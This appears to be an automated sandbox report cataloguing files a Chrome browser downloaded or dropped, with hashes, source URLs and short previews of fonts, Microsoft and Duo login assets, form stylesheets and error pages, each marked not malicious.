                                                          Preview:wOF2......H........ ..H8................................|.`..J.\..<........-..Z...x.6.$..0. .... ..S.7.5..K!.;..../.`..Sn.J.e.52P.(.....=9....f.....$...*.fZ.p...N...t....6.lfS.Ju.i.o.g..<....T"O.o..4..4....M/N.>.K..."[.P...W.u.>]................A.9z....IN^....z..Y.{....m=...+X9<?.......(IA*G8rD....52L0.p .EJ..p....=.......[U...pz..g...../L.U.......P..W.U..q$L..6......C.M.0..R..........D(.ilX.Y..SZ.R...Q..j.6.@\."|.l......3....,.T.....L...ap0......6.j.\&O.z`*.$.*_+vwnr...,....?W.T....!.J...L#%.......A}........\.....l...:....U..u.J.0....O......&.!.)4.V..:.}.0f....:W......?U.....%...b...!....yA.sw.....5..T .}{.t!F.G....{"..pQ.S.v.S....t......U.Y|.v.@....|..(..V.........^....../.7......K......J.Uq/L.T-.`.O........;........';vWq.+....J...J..p.....sB`(1LC.k....?Z{...v>dS....F..........\.....UetU........6.V...vE....._.../...%.q...^.l...>^.z..l..p....j..@H...`X.p...KQ. .<@...I...BF.......L..6...y.2=.P....8;..@`.m.....R.B.L.r.*T.T..l@.6.Y....}g.....F.n...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):919
                                                          Entropy (8bit):5.43441448747816
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:376D35528EE98ACC57CF649A5DD1E4A4
                                                          SHA1:2F9486D4F6F4470EE1E17D07DC0D43A198F37AB7
                                                          SHA-256:74A013F470252F586F76157D2CFBB42303D5883BC6A6B71B6718FE536A4AC7ED
                                                          SHA-512:27850B9D82013D7BC51328594B2E7F02EC2AE4307D870C84A36AA21334D509ED69421D696E63F232282E04C4D00347EDF18737C18413F8D1506C8FABD879AE95
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<TITLE>ERROR: The request could not be satisfied</TITLE>.</HEAD><BODY>.<H1>403 ERROR</H1>.<H2>The request could not be satisfied.</H2>.<HR noshade size="1px">.Request blocked..We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner..<BR clear="all">.If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation..<BR clear="all">.<HR noshade size="1px">.<PRE>.Generated by cloudfront (CloudFront).Request ID: xiP3Eu8uiJf6zM1fN3VjAqKw1A-Fz5xoN3XB8pXCr-ATiRP9na7aXQ==.</PRE>.<ADDRESS>.</ADDRESS>.</BODY></HTML>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (61177)
                                                          Category:downloaded
                                                          Size (bytes):113378
                                                          Entropy (8bit):5.285066693137765
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9C837C2B6C9C441656C3C64BE6FC6401
                                                          SHA1:D44AA83093C4109DDD8FFAEA60755F05D1BFE7D3
                                                          SHA-256:68C2994E21A564345EB3B4091DD2334C9CBDDB0AECDA45EE963C6DE2E1629B93
                                                          SHA-512:AF04835BCC621FE1793C4661FDB03EDEA16219BAA77F1198AA419F771B6B3DCDAC3DA92676568C207022251483AB79C75AB6DF2CE94924748FF9CEBF64AFF5A2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css
                                                          Preview:/*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any person
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):3651
                                                          Entropy (8bit):4.094801914706141
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                          SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                          SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                          SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 29868, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):29868
                                                          Entropy (8bit):7.99276151568518
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:8B26CC331E323DDA95EA6D0DCF4D7542
                                                          SHA1:1F6B0E5440044F6AA75B1F73D2F9C63A2F75BBA9
                                                          SHA-256:2D5059C07B957F989EE2ED276E1F6D20428F4D3ED2523E7C305BD3E3EBC092EC
                                                          SHA-512:95C866575DC440B59954228F38A2B1CFE942E4FC5FB3B6DCF76C5595F213AC8E7B78844ABFE81D689567CD951ED5C97E9D445AD3183016246BFC022D01AE1673
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://fonts.gstatic.com/s/calligraffitti/v19/46k2lbT3XjDVqJw3DCmCFjE0vkFeOZc.woff2
                                                          Preview:wOF2......t..........tR.........................`.......a.....l.....0..6.$..\. .....g......l\.v;@P..g..n.Vg8*.... sI.....=..^.*..l.REF...0....SK.zR..K)......`..:.hS.ZD"...,.D.q..]...6.|..BY.._..K&,...N...I0.J....0.Sc....y....{o$2I&.. .4.n{wl.&.)T....*v....mw[.Y5....(...).J.X..QXX...b.....o}._.....+<..~... .....e...H..]..*\Y.B.'...9>7...I.B.....<@..ZQj.bkng.[.r..^..].X..;.<:-s%.%<....$..........&....p".C......*...O.N.......`8...........%q..}.=..G......IbK..._*....#..R...J.. ..U...g..s..b.38_.C...1+".../..U.....*.y....9....iO!..*...*....PP(...m..XP..d..^..B........... a...m.&5!..>.Oc..-T...lg.=...av.kB.4Y.S....zvW..(4..v.....e.'....:..*.V'........u.?..Kt.Bs$..A..q!......._)j.,I...r..:D....U.V..@.b_.'.6..}.)......j.z.f..!.;.......J.+(N`...WJX+$o_k.....~.U...c.......L..1.....k..]..N.T...4k`X.Xk...p.8.#.x.+.k...\.b..J[.qQ..rr..u.".."W..Q..{..%.`:. &W..}k.cj=g.I.!..............I7p...%[.%......?..D..v.L...g...RP..,...o4.`....g..-.g=j>...fE.X.:pE.L.X.Y=
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):41
                                                          Entropy (8bit):4.180365114215879
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{"code":1,"message":"Session ID unknown"}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 25 x 52, 8-bit/color RGB, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):61
                                                          Entropy (8bit):4.035372245524405
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:7CBFE0BD70692F4A7269A93A015FE74B
                                                          SHA1:A6BE4A11B394E57E3322CC299BC83CA5994ACA59
                                                          SHA-256:753EEECC4443A1C7CBE8303C69D92C99ECB20266B03993A478F4AC0DE2247C97
                                                          SHA-512:61174A9A7EE1690D9AF02E7F105E5DA6BC70ED9D6F0BEFB8EF8087B419DAA1A47C47C9A1403869B6F0B8C359F6DE84BC3467F84AD46C66BEC7AF155834EE26C7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e0cc427199843b0/1731312212828/ofqShAR-ramq_8T
                                                          Preview:.PNG........IHDR.......4............IDAT.....$.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                          Category:dropped
                                                          Size (bytes):49911
                                                          Entropy (8bit):7.994516776763163
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                          SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                          SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                          SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):185
                                                          Entropy (8bit):5.109081038505221
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:DFA98F9376C8719907E8E545C91322BF
                                                          SHA1:4FBCD47391738B8E0A69D2FD4F14336D5AEE6D38
                                                          SHA-256:475812DBCEE7E03295B6CE7381356676ED0284201DA680DAFC41A621ACC88062
                                                          SHA-512:8E650D59C4231E229E30963CB17BE21008A17711C80906991986AEE0B178D6A56BEA77C4FA4DAD7B5D69F8502F73828FE67457525DB52AA899A8CEA8767A89ED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<!DOCTYPE html>.<html lang="en">.<head>.<meta charset="utf-8">.<title>Error</title>.</head>.<body>.<pre>Cannot GET /api/forms/672e80213f65b48c054fd942/submissions</pre>.</body>.</html>.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):1592
                                                          Entropy (8bit):4.205005284721148
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:4E48046CE74F4B89D45037C90576BFAC
                                                          SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                          SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                          SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:GIF image data, version 89a, 352 x 3
                                                          Category:dropped
                                                          Size (bytes):3620
                                                          Entropy (8bit):6.867828878374734
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                          SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                          SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                          SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (22593)
                                                          Category:downloaded
                                                          Size (bytes):25313
                                                          Entropy (8bit):5.042068879259945
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:CF4D34A24FF29EF38DBB9D1462986E94
                                                          SHA1:2E52DFFD36663F58E3A71AF18B6074F7E6BB6C76
                                                          SHA-256:2471D9BE5C4FB1381D500AC076E5C5B1494749DB4C1BA3DDD5C3D93C43E0C5E8
                                                          SHA-512:F1ACFBBC942E12DD7B018B3CDDD1B127FE6CAABD21AB58B9F9D3FC2DF6AA1DB05E2B168DBA4A42DEB77CE28A2D80D90F500D168E62A3FE3641AB966B00D54205
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://form.questionscout.com/static/css/bundle.463f0bf5.css
                                                          Preview:@charset "UTF-8";.CircularProgressbar{width:100%;vertical-align:middle}.CircularProgressbar .CircularProgressbar-path{stroke:#3e98c7;stroke-linecap:round;transition:stroke-dashoffset .5s ease 0s}.CircularProgressbar .CircularProgressbar-trail{stroke:#d6d6d6;stroke-linecap:round}.CircularProgressbar .CircularProgressbar-text{fill:#3e98c7;font-size:20px;dominant-baseline:middle;text-anchor:middle}.CircularProgressbar .CircularProgressbar-background{fill:#d6d6d6}.CircularProgressbar.CircularProgressbar-inverted .CircularProgressbar-background{fill:#3e98c7}.CircularProgressbar.CircularProgressbar-inverted .CircularProgressbar-text{fill:#fff}.CircularProgressbar.CircularProgressbar-inverted .CircularProgressbar-path{stroke:#fff}.CircularProgressbar.CircularProgressbar-inverted .CircularProgressbar-trail{stroke:transparent}.ps{overflow:hidden!important;overflow-anchor:none;-ms-overflow-style:none;touch-action:auto;-ms-touch-action:auto}.ps__rail-x{height:15px;bottom:0}.ps__rail-x,.ps__rail-y
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text
                                                          Category:downloaded
                                                          Size (bytes):1928
                                                          Entropy (8bit):5.5821329208457495
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BBD5ACD904FF4A7AC06B2577AD7B49E1
                                                          SHA1:6C4C6CD1BF2A9BBCFC47AC2A8B4D16C9069745B4
                                                          SHA-256:CD7EF0061F22CDDE7884450CA46D90682A6718CD86D9DB19B8371F48D9F200D1
                                                          SHA-512:FE250884B3CCDD8032561E0BDB11DF1FB9A9BB88F53313BB57B11FA7FB8688212894B6599932BFB88B4375CC38D762838C5F4F85EED3C7539EA241EFBDA4BCAE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://cisco.login.duosecurity.com/email_first?authkey=ASWZ3SBPLN8QAPGSFWVE&scid=3ef691dea04c48df849303cb0bf2e707&req-trace-group=7dc51c382c915028cbaaee37
                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<title>Login</title>.<meta charset="utf-8" />.<meta name="viewport" content="width=device-width, initial-scale=1">.<link rel="stylesheet" href="&#x2f;static&#x2f;css&#x2f;page&#x2f;email-first.css&#x3f;v&#x3d;8132c">.<link rel="shortcut icon" href="&#x2f;static&#x2f;images&#x2f;favicon_duo.ico&#x3f;v&#x3d;e3716" />.</head>.<body>.<div.id="login-parent".data-authkey="AS815CT11SEG9Y3IOBN9".data-custom-accent-color="&#x23;155CDE".data-custom-background="".data-custom-background-color="&#x23;E7E9ED".data-custom-logo-url="https&#x3a;&#x2f;&#x2f;ux-asset-commercial.duosecurity.com&#x2f;customization&#x2f;account&#x2f;pjr5mk7gIVVM96clMnJeaB_2v7s7l9mi0IW7F6yfzFw&#x2f;logo_image.png&#x3f;versionId&#x3d;DzI1NMCJNJv6J3By1BhKLYgM8B5W6KuR".data-custom-username-label="".data-email-first-username="john.smith&#x40;cisco.com".data-phishing-prot
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1043
                                                          Entropy (8bit):4.732223522165644
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:44BF720F31B5F75C31B168A33917F16E
                                                          SHA1:FC784F0D6E413F85686841997001A1E421C57437
                                                          SHA-256:AB5D7957B1604C8E97D2CD5FCF4C89CED2BE0732CBCA6520B5C7FED43BBB07F0
                                                          SHA-512:19952DD6F7C8FB02E83D97770D77522AB402CAF7DCDFEA690CA6D7EA416C7F2702231352715DC5166A938A813D0DD521F0C03BF6CB2DD50BC19F4C611444588B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<!DOCTYPE html>.. [if IE 8]> <html lang="en" class="ie ie8"> <![endif]-->. [if IE 9]> <html lang="en" class="ie ie9"> <![endif]-->. [if gt IE 9]> > <html lang="en"> <![endif]-->. <head>. <meta charset="utf-8">. <title>Oops</title>. <link rel="stylesheet" href="/static/css/page/errors.css">. <link rel="shortcut icon" href="/static/images/favicon_duo.ico">. </head>. <body>. <div class="container">. <img height="120px" alt="Error". src="/static/images/oops.png". srcset="/static/images/oops.png 1x, /static/images/oops@2x.png 2x". >.. <p class="large-text">Looks like we're having some server issues.</p>.. <hr>.. <p>If you think something is broken, report a problem.</p>.. <a class="button homepage-button" href="/">. Go to Homepage. </a>.. <a class="button report-button" href="https://duo.com/about/contact" target="_blank" rel="noreferrer noopener">. Report a Probl
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (11150)
                                                          Category:downloaded
                                                          Size (bytes):66281
                                                          Entropy (8bit):5.01240450581956
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BB2847894D8A12D9AC4F118B4CB2DD82
                                                          SHA1:6847D51B82AD64F98DF2357FB1989C16641A4CA2
                                                          SHA-256:8132C31A75DE34EAA44D0E0449C991B2CA86FCFF13C78C29EF2824851E8CC5E3
                                                          SHA-512:21675BFDC651C1CBED80CC921639319EB76185903A785D3A1A34F44EFA1C4793F7EF5CD91F1E5C2949691A91F4C7EC2E43BEC4FBB9BC5A849D3536E1E2D93DC4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://cisco.login.duosecurity.com/static/css/page/email-first.css?v=8132c
                                                          Preview:html.border-box{box-sizing:border-box}html.border-box *,html.border-box *:before,html.border-box *:after{box-sizing:inherit}body{color:#363f44;color:#363f44;color:var(--color-font-base);font-family:"Helvetica Neue",Helvetica,Arial,Sans-serif;font-size:0.875rem;font-size:0.875rem;font-size:var(--size-font-base);font-weight:400;font-weight:400;font-weight:var(--weight-font-base);line-height:1.5rem;line-height:1.5rem;line-height:var(--size-line-height-body);letter-spacing:0}p{margin-top:0;margin-bottom:0}.caption{font-size:0.75rem;font-size:0.75rem;font-size:var(--size-font-caption);line-height:1.5rem;line-height:1.5rem;line-height:var(--size-line-height-caption);weight:400;weight:400;weight:var(--weight-font-caption-regular)}.caption--bold{weight:900;weight:900;weight:var(--weight-font-caption-bold)}.h1,h2,h3,h4,h5,h6{color:#363f44;color:#363f44;color:var(--color-font-base);font-family:"Helvetica Neue",Helvetica,Arial,Sans-serif;font-size:var(--size-font-header-medium);font-weight:900;fo
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (64612)
                                                          Category:dropped
                                                          Size (bytes):113769
                                                          Entropy (8bit):5.492540089333064
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:C6C029BA88D52E5312FEC69603A00340
                                                          SHA1:079011F6F0662C11AE907C773EFE8E0C9338EAD0
                                                          SHA-256:DDD0BB1C19B3D2D045BFCDE85D2020BBA57854C887A6691B66DBA3DA1BB3AFBE
                                                          SHA-512:7DF09CD949A43D53D62D9013718158966508DEC2338491FFB38DC33D2EB85FF5C699792AE578975DA0E4F03CC7EA03774624208D06924EEA4C2EAC92E6E22C60
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[37],{1373:function(e,t,
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 228 x 228, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):23613
                                                          Entropy (8bit):7.9858966066563735
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:80204231C6C999E9CE6B7ABCC33D93F1
                                                          SHA1:CFBE4C559B134DE38367E618FC64B30690E2E257
                                                          SHA-256:BA9C7C8265F7A11FE2C2FFE7B2CF3B8EEBD99D11EF224011777D93F2DC51B5E4
                                                          SHA-512:40F43FB19545CF51F89E0F54CA744573C0246EEBF4BE0418E389016586E76652D2E1FFD918D883BBD0D7931B757C997EF54D244C68DDCD3FE13DF93D811750E1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://form.questionscout.com/favicon.ico
                                                          Preview:.PNG........IHDR..............W......sRGB.......@.IDATx..=.`.e.o.o6.WB:%...T...*U..A............NE.<{..E...!...^Bz...nvw...6.2.;[S.O..|.}....y.{.........` .......` .......` .......` .......` .......` .......` .......` .......` .......` .......` ......e.....|.|Y..E......`A..............*.Yu......M......c @....p.P.m."V;...,l>.X6I@..&.p-......|..Ov]..\......W..Q..tv..d.p...8$B..n..0.S...R....y.]..N.F.......hQ..U.?.\...\.....,.......J...*...b @.V.f....j:..6..G...V.}~..cD..^..?.R........U.....|.=...,k|.X.s.)).2.....X......N..v....Z0.\.......?. Lw.F..s..$..U.....}..a.'.Q*..... 8Ha.......U..PU..u.-8$k...a.......g.U.a...@E...eM....3....#..T#B....X.X.....r8]R..N...(....qj...u..N;...I.\......#;..cYv1>5.. =%......B...8WV...AK[..>.....+..|.y.@......v7...p.{.Z....'bs..#M.........t6%.H...!.=0...C.5g[{..n.hvy`t.P.!.vn=....#..k=.....=.[.3xx..xVc\...l.z.F..6.....z.....Wt..../Y.3[.A.y..}...B.b.......v...g4._...aNy.....I.L.A.9d.&.B&.?..]&8....H..noUq...-0.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):16
                                                          Entropy (8bit):3.625
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9B5719B531993D7EEF5EB4C692F2238C
                                                          SHA1:9C9A21624C975F0741B743348DE85A09FDA7E669
                                                          SHA-256:27008C4818CC0695B1496B0E8026DDFB7999C7FA066F78C61A76AF0FFECEF4BF
                                                          SHA-512:39CC9DC2E4DACFA6D1D7E23759ED7FB13C3111992BCA5DAA97CE1ADB37205056118FC1105D85E38B8E902A2F8CD68656AD36D53642DE60368E054BE86942BBA8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAm1HWDvH6ZtMhIFDVALr7A=?alt=proto
                                                          Preview:CgkKBw1QC6+wGgA=
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:very short file (no magic)
                                                          Category:downloaded
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
